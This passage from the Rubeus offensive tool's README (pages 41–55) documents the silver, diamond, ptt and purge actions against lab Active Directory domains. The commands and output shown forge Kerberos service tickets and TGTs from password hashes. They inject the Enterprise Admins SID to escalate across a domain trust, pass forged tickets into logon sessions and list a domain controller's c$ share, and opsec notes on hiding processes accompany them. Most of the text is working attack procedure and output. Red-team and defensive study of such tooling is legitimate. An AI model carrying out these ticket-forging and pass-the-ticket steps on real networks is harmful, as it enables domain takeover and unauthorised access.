'harmj0y@rubeus.ghostpack.local'\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 41 of 100\n\n[*] AuthTime : 30/07/2021 00:22:38\r\n[*] StartTime : 30/07/2021 00:22:38\r\n[*] EndTime : 30/07/2021 10:22:38\r\n[*] RenewTill : 06/08/2021 00:22:38\r\n[*] base64(ticket.kirbi):\r\n doIFdTCCBXGgAwIBBaEDAgEWooIERDCCBEBhggQ8MIIEOKADAgEFoRgbFlJVQkVVUy5HSE9TVFBBQ0su\r\n ...(snip)...\r\n dWJldXMuZ2hvc3RwYWNrLmxvY2Fs\r\n[*] Generating EncTicketPart\r\n[*] Signing PAC\r\n[*] Encrypting EncTicketPart\r\n[*] Generating Ticket\r\n[*] Generated KERB-CRED\r\n[*] Forged a TGT for 'harmj0y@rubeus.ghostpack.local'\r\n[*] AuthTime : 31/07/2021 00:22:38\r\n[*] StartTime : 31/07/2021 00:22:38\r\n[*] EndTime : 31/07/2021 10:22:38\r\n[*] RenewTill : 07/08/2021 00:22:38\r\n[*] base64(ticket.kirbi):\r\n doIFdTCCBXGgAwIBBaEDAgEWooIERDCCBEBhggQ8MIIEOKADAgEFoRgbFlJVQkVVUy5HSE9TVFBBQ0su\r\n ...(snip)...\r\n dWJldXMuZ2hvc3RwYWNrLmxvY2Fs\r\n[*] Generating EncTicketPart\r\n[*] Signing PAC\r\n[*] Encrypting EncTicketPart\r\n[*] Generating Ticket\r\n[*] Generated KERB-CRED\r\n[*] Forged a TGT for 'harmj0y@rubeus.ghostpack.local'\r\n[*] AuthTime : 01/08/2021 00:22:38\r\n[*] StartTime : 01/08/2021 00:22:38\r\n[*] EndTime : 01/08/2021 10:22:38\r\n[*] RenewTill : 08/08/2021 00:22:38\r\n[*] base64(ticket.kirbi):\r\n doIFdTCCBXGgAwIBBaEDAgEWooIERDCCBEBhggQ8MIIEOKADAgEFoRgbFlJVQkVVUy5HSE9TVFBBQ0su\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 42 of 100\n\n...(snip)...\r\n dWJldXMuZ2hvc3RwYWNrLmxvY2Fs\r\n[*] Generating EncTicketPart\r\n[*] Signing PAC\r\n[*] Encrypting EncTicketPart\r\n[*] Generating Ticket\r\n[*] Generated KERB-CRED\r\n[*] Forged a TGT for 'harmj0y@rubeus.ghostpack.local'\r\n[*] AuthTime : 02/08/2021 00:22:38\r\n[*] StartTime : 02/08/2021 00:22:38\r\n[*] EndTime : 02/08/2021 10:22:38\r\n[*] RenewTill : 09/08/2021 00:22:38\r\n[*] base64(ticket.kirbi):\r\n doIFdTCCBXGgAwIBBaEDAgEWooIERDCCBEBhggQ8MIIEOKADAgEFoRgbFlJVQkVVUy5HSE9TVFBBQ0su\r\n ...(snip)...\r\n dWJldXMuZ2hvc3RwYWNrLmxvY2Fs\r\nsilver\r\nThe silver action will forge a ticket for the user /user:X and service /service:SPN , encrypting the ticket with\r\nthe hash passed with /des:X , /rc4:X , /aes128:X or /aes256:X and using the same key to create the\r\nServerChecksum. If the /krbkey:X argument is passed this will be used to create the KDCChecksum and\r\nTicketChecksum (if the service is not krbtgt/domain.com or domain.com is different to the from the realm used\r\nwithin the ticket, ie. it is a referral ticket), otherwise the same key used to encrypt the ticket is used. If\r\nkrbenctype:X is not passed, the same encryption type used by the service key is assumed for the KDCChecksum\r\nand TicketChecksum.\r\nThe /cname:X and /crealm:X arguments can be used to set different values for those fields within the\r\nEncTicketPart (encrypted part of the ticket), this is sometimes seen within referral delegation tickets. A\r\nS4UDelegationInfo PAC section can be added by passing the /s4uproxytarget:X and\r\n/s4utransitedservices:SPN1,SPN2,... arguments, this section provides a final target for delegation and the list\r\nof SPNs the delegation has happened through.\r\nThe /authdata flag can be used to add some generic Authorization Data sections to the EncTicketPart, by\r\ndefault this will include a KERB-LOCAL section and a KERB-AD-RESTRICTION-ENTRY section with some\r\ndefault values.\r\nThe /nofullpacsig flag will exclude the new FullPacChecksum, introduced to resolve the CVE-2022-37967\r\nvulnerability. This signature is included by default in any tickets not secured with the krbtgt key.\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 43 of 100\n\nForging a service ticket to cifs/SQL1.rubeus.ghostpack.local for the user ccob using the services RC4 password\r\nhash and signing the KDCChecksum and TicketChecksum with the proper KRBTGT AES256 key, using LDAP\r\nwith alternate credentials to get the PAC information:\r\nC:\\Rubeus\u003edir \\\\SQL1.rubeus.ghostpack.local\\c$\r\nThe user name or password is incorrect.\r\nC:\\Rubeus\u003eRubeus.exe silver /service:cifs/SQL1.rubeus.ghostpack.local /rc4:f74b07eb77caa52b8d227a113cb649a6 /lda\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v2.0.0\r\n[*] Action: Build TGS\r\n[*] Trying to query LDAP using LDAPS for user information on domain controller PDC1.rubeus.ghostpack.local\r\n[*] Searching path 'DC=rubeus,DC=ghostpack,DC=local' for '(samaccountname=ccob)'\r\n[*] Retrieving group and domain policy information over LDAP from domain controller PDC1.rubeus.ghostpack.local\r\n[*] Searching path 'DC=rubeus,DC=ghostpack,DC=local' for '(|(distinguishedname=CN=Domain Admins,CN=Users,DC=rube\r\n[*] Attempting to mount: \\\\pdc1.rubeus.ghostpack.local\\SYSVOL\r\n[*] \\\\pdc1.rubeus.ghostpack.local\\SYSVOL successfully mounted\r\n[*] Attempting to unmount: \\\\pdc1.rubeus.ghostpack.local\\SYSVOL\r\n[*] \\\\pdc1.rubeus.ghostpack.local\\SYSVOL successfully unmounted\r\n[*] Retrieving netbios name information over LDAP from domain controller PDC1.rubeus.ghostpack.local\r\n[!] Unable to query forest root using System.DirectoryServices.ActiveDirectory.Forest, assuming rubeus.ghostpack\r\n[*] Searching path 'CN=Configuration,DC=rubeus,DC=ghostpack,DC=local' for '(\u0026(netbiosname=*)(dnsroot=rubeus.ghos\r\n[*] Building PAC\r\n[*] Domain : RUBEUS.GHOSTPACK.LOCAL (RUBEUS)\r\n[*] SID : S-1-5-21-3237111427-1607930709-3979055039\r\n[*] UserId : 1109\r\n[*] Groups : 512,513\r\n[*] ServiceKey : F74B07EB77CAA52B8D227A113CB649A6\r\n[*] ServiceKeyType : KERB_CHECKSUM_HMAC_MD5\r\n[*] KDCKey : 6A8941DCB801E0BF63444B830E5FAABEC24B442118EC60DEF839FD47A10AE3D5\r\n[*] KDCKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256\r\n[*] Service : cifs\r\n[*] Target : SQL1.rubeus.ghostpack.local\r\n[*] Generating EncTicketPart\r\n[*] Signing PAC\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 44 of 100\n\n[*] Encrypting EncTicketPart\r\n[*] Generating Ticket\r\n[*] Generated KERB-CRED\r\n[*] Forged a TGS for 'ccob' to 'cifs/SQL1.rubeus.ghostpack.local'\r\n[*] AuthTime : 29/07/2021 01:00:23\r\n[*] StartTime : 29/07/2021 01:00:23\r\n[*] EndTime : 29/07/2021 11:00:23\r\n[*] RenewTill : 05/08/2021 01:00:23\r\n[*] base64(ticket.kirbi):\r\n doIFZTCCBWGgAwIBBaEDAgEWooIESDCCBERhggRAMIIEPKADAgEFoRgbFlJVQkVVUy5HSE9TVFBBQ0su\r\n ...(snip)...\r\n bG9jYWw=\r\n[+] Ticket successfully imported!\r\nC:\\Rubeus\u003edir \\\\SQL1.rubeus.ghostpack.local\\c$\r\n Volume in drive \\\\SQL1.rubeus.ghostpack.local\\c$ has no label.\r\n Volume Serial Number is 1AD6-20BE\r\n Directory of \\\\SQL1.rubeus.ghostpack.local\\c$\r\n15/09/2018 08:19 \u003cDIR\u003e PerfLogs\r\n20/07/2021 18:17 \u003cDIR\u003e Program Files\r\n20/07/2021 18:17 \u003cDIR\u003e Program Files (x86)\r\n21/07/2021 01:53 \u003cDIR\u003e Rubeus\r\n20/07/2021 21:02 \u003cDIR\u003e temp\r\n20/07/2021 22:31 \u003cDIR\u003e Users\r\n20/07/2021 18:18 \u003cDIR\u003e Windows\r\n 0 File(s) 0 bytes\r\n 7 Dir(s) 124,275,159,040 bytes free\r\nForging a referral TGT for a trusting domain, using LDAP to retrieve the PAC information:\r\nC:\\Rubeus\u003eRubeus.exe silver /user:exploitph /ldap /service:krbtgt/dev.rubeus.ghostpack.local /rc4:856a102305584\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 45 of 100\n\nv2.0.0\r\n[*] Action: Build TGS\r\n[*] Trying to query LDAP using LDAPS for user information on domain controller PDC1.rubeus.ghostpack.local\r\n[*] Searching path 'DC=rubeus,DC=ghostpack,DC=local' for '(samaccountname=exploitph)'\r\n[*] Retrieving domain policy information over LDAP from domain controller PDC1.rubeus.ghostpack.local\r\n[*] Searching path 'DC=rubeus,DC=ghostpack,DC=local' for '(|(objectsid=S-1-5-21-3237111427-1607930709-3979055039\r\n[*] Attempting to mount: \\\\pdc1.rubeus.ghostpack.local\\SYSVOL\r\n[*] \\\\pdc1.rubeus.ghostpack.local\\SYSVOL successfully mounted\r\n[*] Attempting to unmount: \\\\pdc1.rubeus.ghostpack.local\\SYSVOL\r\n[*] \\\\pdc1.rubeus.ghostpack.local\\SYSVOL successfully unmounted\r\n[*] Retrieving netbios name information over LDAP from domain controller PDC1.rubeus.ghostpack.local\r\n[*] Searching path 'CN=Configuration,DC=rubeus,DC=ghostpack,DC=local' for '(\u0026(netbiosname=*)(dnsroot=rubeus.ghos\r\n[*] Building PAC\r\n[*] Domain : RUBEUS.GHOSTPACK.LOCAL (RUBEUS)\r\n[*] SID : S-1-5-21-3237111427-1607930709-3979055039\r\n[*] UserId : 1104\r\n[*] Groups : 513\r\n[*] ServiceKey : 856A1023055848748E7B9D505EBE0E02\r\n[*] ServiceKeyType : KERB_CHECKSUM_HMAC_MD5\r\n[*] KDCKey : 856A1023055848748E7B9D505EBE0E02\r\n[*] KDCKeyType : KERB_CHECKSUM_HMAC_MD5\r\n[*] Service : krbtgt\r\n[*] Target : dev.rubeus.ghostpack.local\r\n[*] Generating EncTicketPart\r\n[*] Signing PAC\r\n[*] Encrypting EncTicketPart\r\n[*] Generating Ticket\r\n[*] Generated KERB-CRED\r\n[*] Forged a TGT for 'exploitph@rubeus.ghostpack.local'\r\n[*] AuthTime : 29/07/2021 02:45:54\r\n[*] StartTime : 29/07/2021 02:45:54\r\n[*] EndTime : 29/07/2021 12:45:54\r\n[*] RenewTill : 05/08/2021 02:45:54\r\n[*] base64(ticket.kirbi):\r\n doIFojCCBZ6gAwIBBaEDAgEWooIEfjCCBHphggR2MIIEcqADAgEFoRgbFlJVQkVVUy5HSE9TVFBBQ0su\r\n ...(snip)...\r\n LmxvY2Fs\r\nThis ticket can then be used to request service tickets on the trusting domain using asktgs :\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 46 of 100\n\nC:\\Rubeus\u003eRubeus.exe asktgs /service:cifs/devdc1.dev.rubeus.ghostpack.local /dc:devdc1.dev.rubeus.ghostpack.loc\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v2.0.0\r\n[*] Action: Ask TGS\r\n[*] Using domain controller: devdc1.dev.rubeus.ghostpack.local (192.168.71.85)\r\n[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket\r\n[*] Building TGS-REQ request for: 'cifs/devdc1.dev.rubeus.ghostpack.local'\r\n[+] TGS request successful!\r\n[*] base64(ticket.kirbi):\r\n doIFrzCCBaugAwIBBaEDAgEWooIEgzCCBH9hggR7MIIEd6ADAgEFoRwbGkRFVi5SVUJFVVMuR0hPU1RQ\r\n ...(snip)...\r\n ZXVzLmdob3N0cGFjay5sb2NhbA==\r\n ServiceName : cifs/devdc1.dev.rubeus.ghostpack.local\r\n ServiceRealm : DEV.RUBEUS.GHOSTPACK.LOCAL\r\n UserName : exploitph\r\n UserRealm : RUBEUS.GHOSTPACK.LOCAL\r\n StartTime : 29/07/2021 02:51:05\r\n EndTime : 29/07/2021 12:45:54\r\n RenewTill : 05/08/2021 02:45:54\r\n Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable\r\n KeyType : aes256_cts_hmac_sha1\r\n Base64(key) : v1Bnp3plKCePeRpg1hrtYkI7bPDk6vw5uoj5MBNSThw=\r\nForge a referral TGT for dev.ccob@dev.rubeus.ghostpack.local for the parent domain rubeus.ghostpack.local\r\nand include the SID of the Enterprise Admins group:\r\nC:\\Rubeus\u003eRubeus.exe silver /user:dev.ccob /ldap /service:krbtgt/rubeus.ghostpack.local /rc4:856a1023055848748e\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 47 of 100\n\nv2.0.0\r\n[*] Action: Build TGS\r\n[*] Trying to query LDAP using LDAPS for user information on domain controller DevDC1.dev.rubeus.ghostpack.local\r\n[*] Searching path 'DC=dev,DC=rubeus,DC=ghostpack,DC=local' for '(samaccountname=dev.ccob)'\r\n[*] Retrieving domain policy information over LDAP from domain controller DevDC1.dev.rubeus.ghostpack.local\r\n[*] Searching path 'DC=dev,DC=rubeus,DC=ghostpack,DC=local' for '(|(objectsid=S-1-5-21-2065789546-4129202522-221\r\n[*] Attempting to mount: \\\\devdc1.dev.rubeus.ghostpack.local\\SYSVOL\r\n[*] \\\\devdc1.dev.rubeus.ghostpack.local\\SYSVOL successfully mounted\r\n[*] Attempting to unmount: \\\\devdc1.dev.rubeus.ghostpack.local\\SYSVOL\r\n[*] \\\\devdc1.dev.rubeus.ghostpack.local\\SYSVOL successfully unmounted\r\n[*] Retrieving netbios name information over LDAP from domain controller DevDC1.dev.rubeus.ghostpack.local\r\n[*] Searching path 'CN=Configuration,DC=rubeus,DC=ghostpack,DC=local' for '(\u0026(netbiosname=*)(dnsroot=dev.rubeus.\r\n[*] Building PAC\r\n[*] Domain : DEV.RUBEUS.GHOSTPACK.LOCAL (DEV)\r\n[*] SID : S-1-5-21-2065789546-4129202522-221898516\r\n[*] UserId : 1107\r\n[*] Groups : 513\r\n[*] ExtraSIDs : S-1-5-21-3237111427-1607930709-3979055039-519\r\n[*] ServiceKey : 856A1023055848748E7B9D505EBE0E02\r\n[*] ServiceKeyType : KERB_CHECKSUM_HMAC_MD5\r\n[*] KDCKey : 856A1023055848748E7B9D505EBE0E02\r\n[*] KDCKeyType : KERB_CHECKSUM_HMAC_MD5\r\n[*] Service : krbtgt\r\n[*] Target : rubeus.ghostpack.local\r\n[*] Generating EncTicketPart\r\n[*] Signing PAC\r\n[*] Encrypting EncTicketPart\r\n[*] Generating Ticket\r\n[*] Generated KERB-CRED\r\n[*] Forged a TGT for 'dev.ccob@dev.rubeus.ghostpack.local'\r\n[*] AuthTime : 29/07/2021 03:03:34\r\n[*] StartTime : 29/07/2021 03:03:34\r\n[*] EndTime : 29/07/2021 13:03:34\r\n[*] RenewTill : 05/08/2021 03:03:34\r\n[*] base64(ticket.kirbi):\r\n doIF0TCCBc2gAwIBBaEDAgEWooIEqTCCBKVhggShMIIEnaADAgEFoRwbGkRFVi5SVUJFVVMuR0hPU1RQ\r\n ...(snip)...\r\n G9zdHBhY2subG9jYWw=\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 48 of 100\n\nThis referral TGT can then be used to request service tickets for services in rubeus.ghostpack.local using the\r\nasktgs command and gain the privileges of the Enterprise Admins group:\r\nC:\\Rubeus\u003eRubeus.exe asktgs /service:cifs/pdc1.rubeus.ghostpack.local /dc:pdc1.rubeus.ghostpack.local /ptt /tic\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v2.0.0\r\n[*] Action: Ask TGS\r\n[*] Using domain controller: pdc1.rubeus.ghostpack.local (192.168.71.80)\r\n[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket\r\n[*] Building TGS-REQ request for: 'cifs/pdc1.rubeus.ghostpack.local'\r\n[+] TGS request successful!\r\n[+] Ticket successfully imported!\r\n[*] base64(ticket.kirbi):\r\n doIF9zCCBfOgAwIBBaEDAgEWooIE1DCCBNBhggTMMIIEyKADAgEFoRgbFlJVQkVVUy5HSE9TVFBBQ0su\r\n ...(snip)...\r\n ZnMbG3BkYzEucnViZXVzLmdob3N0cGFjay5sb2NhbA==\r\n ServiceName : cifs/pdc1.rubeus.ghostpack.local\r\n ServiceRealm : RUBEUS.GHOSTPACK.LOCAL\r\n UserName : dev.ccob\r\n UserRealm : DEV.RUBEUS.GHOSTPACK.LOCAL\r\n StartTime : 29/07/2021 03:04:26\r\n EndTime : 29/07/2021 13:03:34\r\n RenewTill : 05/08/2021 03:03:34\r\n Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable\r\n KeyType : aes256_cts_hmac_sha1\r\n Base64(key) : lQGdcWT5/cacHGFko3fDJvF9poFK+tH5hctlDN89peY=\r\nC:\\Rubeus\u003edir \\\\pdc1.rubeus.ghostpack.local\\c$\r\n Volume in drive \\\\pdc1.rubeus.ghostpack.local\\c$ has no label.\r\n Volume Serial Number is 3C5F-0EF1\r\n Directory of \\\\pdc1.rubeus.ghostpack.local\\c$\r\n30/06/2021 02:13 \u003cDIR\u003e inetpub\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 49 of 100\n\n15/09/2018 08:19 \u003cDIR\u003e PerfLogs\r\n09/06/2021 17:45 \u003cDIR\u003e Program Files\r\n09/06/2021 17:45 \u003cDIR\u003e Program Files (x86)\r\n14/07/2021 01:18 \u003cDIR\u003e Rubeus\r\n19/07/2021 20:48 \u003cDIR\u003e temp\r\n30/06/2021 02:14 \u003cDIR\u003e Users\r\n14/07/2021 02:17 \u003cDIR\u003e Windows\r\n 0 File(s) 0 bytes\r\n 8 Dir(s) 94,901,772,288 bytes free\r\ndiamond\r\nThe diamond action will forge a diamond TGT by modifying a TGT requested for a user using the given\r\narguments. First a TGT will be requested for the specified user and encryption key ( /rc4 , /aes128 , /aes256 ,\r\nor /des ). A /password flag can also be used instead of a hash - in this case /enctype:X will default to RC4\r\nfor the exchange, with des|aes128|aes256 as options. Alternatively, PKINIT authentication is supported with the\r\n/certificate:X argument. When the private key within the PFX file is password protected, this password can be\r\npassed with the /password:X argument. Lastly, the /tgtdeleg flag can be passed to request a TGT using the\r\ntgtdeleg trick. The /krbkey:X argument is used to decrypt the ticket, resign it after the changes have been made,\r\nand rencrypt the ticket.\r\nIf no /domain is specified, the computer's current domain is extracted, and if no /dc is specified the same is\r\ndone for the system's current domain controller. The /ptt flag will \"pass-the-ticket\" and apply the resulting\r\nKerberos credential to the current logon session. The /luid:0xA.. flag will apply the ticket to the specified\r\nlogon session ID (elevation needed) instead of the current logon session.\r\nNote that no elevated privileges are needed on the host to request TGTs or apply them to the current logon\r\nsession, just the correct hash for the target user. Also, another opsec note: only one TGT can be applied at a time to\r\nthe current logon session, so the previous TGT is wiped when the new ticket is applied when using the /ptt\r\noption. A workaround is to use the /createnetonly:C:\\X.exe parameter (which hides the process by default\r\nunless the /show flag is specified), or request the ticket and apply it to another logon session with ptt\r\n/luid:0xA.. .\r\nThe /ticketuser:X argument is used to specify the username to be used within the modified ticket,\r\n/ticketuserid:# to specify the user's RID, /groups:RID1,RID2... to specify the groups for the ticket and\r\n/sids:SID1,SID2... to specify the SIDs to be included in the ExtraSIDs field.\r\nCreating a diamond TGT using a username and password:\r\nC:\\Rubeus\u003eRubeus.exe diamond /krbkey:3111b43b220d2f4eb8e68fe7be1179ce69328c9071cba14bef4dbb02b1cfeb9c /user:lok\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 50 of 100\n\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v2.1.1\r\n[*] Action: Diamond Ticket\r\n[*] Using domain controller: earth-dc.marvel.local (10.1.1.11)\r\n[!] Pre-Authentication required!\r\n[!] AES256 Salt: MARVEL.LOCALloki\r\n[*] Using aes256_cts_hmac_sha1 hash: 8A90D4F4E8698E76FA014C97A539C1083EDDCB5A281B1274568758FB999DFCE7\r\n[*] Building AS-REQ (w/ preauth) for: 'marvel.local\\loki'\r\n[*] Using domain controller: 10.1.1.11:88\r\n[+] TGT request successful!\r\n[*] base64(ticket.kirbi):\r\n doIFejCCBXagAwIBBaEDAgEWooIEgzCCBH9hggR7MIIEd6ADAgEFoQ4bDE1BUlZFTC5MT0NBTKIhMB+g\r\n ...(snip)...\r\n oRgwFhsGa3JidGd0GwxNQVJWRUwuTE9DQUw=\r\n[*] Decrypting TGT\r\n[*] Retreiving PAC\r\n[*] Modifying PAC\r\n[*] Signing PAC\r\n[*] Encrypting Modified TGT\r\n[*] base64(ticket.kirbi):\r\n doIFajCCBWagAwIBBaEDAgEWooIEczCCBG9hggRrMIIEZ6ADAgEFoQ4bDE1BUlZFTC5MT0NBTKIhMB+g\r\n ...(snip)...\r\n UlZFTC5MT0NBTA==\r\nCreating a diamond TGT using the tgtdeleg trick:\r\nC:\\Rubeus\u003eRubeus.exe diamond /krbkey:3111b43b220d2f4eb8e68fe7be1179ce69328c9071cba14bef4dbb02b1cfeb9c /tgtdeleg\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v2.1.1\r\n[*] Action: Diamond Ticket\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 51 of 100\n\n[*] No target SPN specified, attempting to build 'cifs/dc.domain.com'\r\n[*] Initializing Kerberos GSS-API w/ fake delegation for target 'cifs/Earth-DC.marvel.local'\r\n[+] Kerberos GSS-API initialization success!\r\n[+] Delegation request success! AP-REQ delegation ticket is now in GSS-API output.\r\n[*] Found the AP-REQ delegation ticket in the GSS-API output.\r\n[*] Authenticator etype: aes256_cts_hmac_sha1\r\n[*] Extracted the service ticket session key from the ticket cache: imNrWVWRhlB61dUk5EWEdQL7DgqBQ/UckUs9pBvw6JU=\r\n[+] Successfully decrypted the authenticator\r\n[*] base64(ticket.kirbi):\r\n doIFejCCBXagAwIBBaEDAgEWooIEgzCCBH9hggR7MIIEd6ADAgEFoQ4bDE1BUlZFTC5MT0NBTKIhMB+g\r\n ...(snip)...\r\n oRgwFhsGa3JidGd0GwxNQVJWRUwuTE9DQUw=\r\n[*] Decrypting TGT\r\n[*] Retreiving PAC\r\n[*] Modifying PAC\r\n[*] Signing PAC\r\n[*] Encrypting Modified TGT\r\n[*] base64(ticket.kirbi):\r\n doIFajCCBWagAwIBBaEDAgEWooIEczCCBG9hggRrMIIEZ6ADAgEFoQ4bDE1BUlZFTC5MT0NBTKIhMB+g\r\n ...(snip)...\r\n UlZFTC5MT0NBTA==\r\nTicket Management\r\nBreakdown of the ticket management commands:\r\nCommand Description\r\nptt Apply a ticket to the current (or specified) logon session\r\npurge Purge the current (or specified) logon session of Kerberos tickets\r\ndescribe Describe a ticket base64 blob or .kirbi file\r\nptt\r\nThe ptt action will submit a /ticket:X (TGT or service ticket) for the current logon session through the\r\nLsaCallAuthenticationPackage() API with a KERB_SUBMIT_TKT_REQUEST message, or (if elevated) to the\r\nlogon session specified by /luid:0xA.. . Like other /ticket:X parameters, the value can be a base64 encoding\r\nof a .kirbi file or the path to a .kirbi file on disk.\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 52 of 100\n\nC:\\Rubeus\u003eRubeus.exe ptt /ticket:doIFmjCCBZagAwIBBaEDAgEWoo..(snip)..\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.3\r\n[*] Action: Import Ticket\r\n[+] Ticket successfully imported!\r\nC:\\Rubeus\u003eRubeus.exe klist\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.3\r\n[*] Action: List Kerberos Tickets (Current User)\r\n [0] - 0x12 - aes256_cts_hmac_sha1\r\n Start/End/MaxRenew: 2/11/2019 2:55:18 PM ; 2/11/2019 7:55:18 PM ; 2/18/2019 2:55:18 PM\r\n Server Name : krbtgt/testlab.local @ TESTLAB.LOCAL\r\n Client Name : dfm.a @ TESTLAB.LOCAL\r\n Flags : name_canonicalize, pre_authent, initial, renewable, forwardable (40e10000)\r\nElevated ticket application to another logon session:\r\nC:\\Rubeus\u003eRubeus.exe klist /luid:0x474722b\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 53 of 100\n\nv1.3.3\r\n[*] Action: List Kerberos Tickets (All Users)\r\n[*] Target LUID : 0x474722b\r\nUserName : patsy\r\nDomain : TESTLAB\r\nLogonId : 0x474722b\r\nUserSID : S-1-5-21-883232822-274137685-4173207997-1169\r\nAuthenticationPackage : Kerberos\r\nLogonType : Interactive\r\nLogonTime : 2/11/2019 10:58:53 PM\r\nLogonServer : PRIMARY\r\nLogonServerDNSDomain : TESTLAB.LOCAL\r\nUserPrincipalName : patsy@testlab.local\r\n [0] - 0x12 - aes256_cts_hmac_sha1\r\n Start/End/MaxRenew: 2/11/2019 2:58:53 PM ; 2/11/2019 7:58:53 PM ; 2/18/2019 2:58:53 PM\r\n Server Name : krbtgt/TESTLAB.LOCAL @ TESTLAB.LOCAL\r\n Client Name : patsy @ TESTLAB.LOCAL\r\n Flags : name_canonicalize, pre_authent, initial, renewable, forwardable (40e10000)\r\nC:\\Rubeus\u003eRubeus.exe ptt /luid:0x474722b /ticket:doIFmjCCBZagAwIBBaEDAgEWoo..(snip)..\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.3\r\n[*] Action: Import Ticket\r\n[*] Target LUID: 0x474722b\r\n[+] Ticket successfully imported!\r\nC:\\Rubeus\u003eRubeus.exe klist /luid:0x474722b\r\n ______ _\r\n(_____ \\ | |\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 54 of 100\n\n_____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.3\r\n[*] Action: List Kerberos Tickets (All Users)\r\n[*] Target LUID : 0x474722b\r\nUserName : patsy\r\nDomain : TESTLAB\r\nLogonId : 0x474722b\r\nUserSID : S-1-5-21-883232822-274137685-4173207997-1169\r\nAuthenticationPackage : Kerberos\r\nLogonType : Interactive\r\nLogonTime : 2/11/2019 10:58:53 PM\r\nLogonServer : PRIMARY\r\nLogonServerDNSDomain : TESTLAB.LOCAL\r\nUserPrincipalName : patsy@testlab.local\r\n [0] - 0x12 - aes256_cts_hmac_sha1\r\n Start/End/MaxRenew: 2/11/2019 2:55:18 PM ; 2/11/2019 7:55:18 PM ; 2/18/2019 2:55:18 PM\r\n Server Name : krbtgt/testlab.local @ TESTLAB.LOCAL\r\n Client Name : dfm.a @ TESTLAB.LOCAL\r\n Flags : name_canonicalize, pre_authent, initial, renewable, forwardable (40e10000)\r\npurge\r\nThe purge action will purge all Kerberos tickets from the current logon session, or (if elevated) to the logon\r\nsession specified by /luid:0xA.. .\r\nC:\\Rubeus\u003eRubeus.exe klist\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.3\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 55 of 100\n\n[*] Action: List Kerberos Tickets (Current User)\r\n [0] - 0x12 - aes256_cts_hmac_sha1\r\n Start/End/MaxRenew: 2/11/2019 3:05:36 PM ; 2/11/2019 8:05:36 PM ; 2/18/2019 3:05:36 PM\r\n Server Name : krbtgt/TESTLAB.LOCAL @ TESTLAB.LOCAL\r\n Client Name : harmj0y @ TESTLAB.LOCAL\r\n Flags : name_canonicalize, pre_authent, renewable, 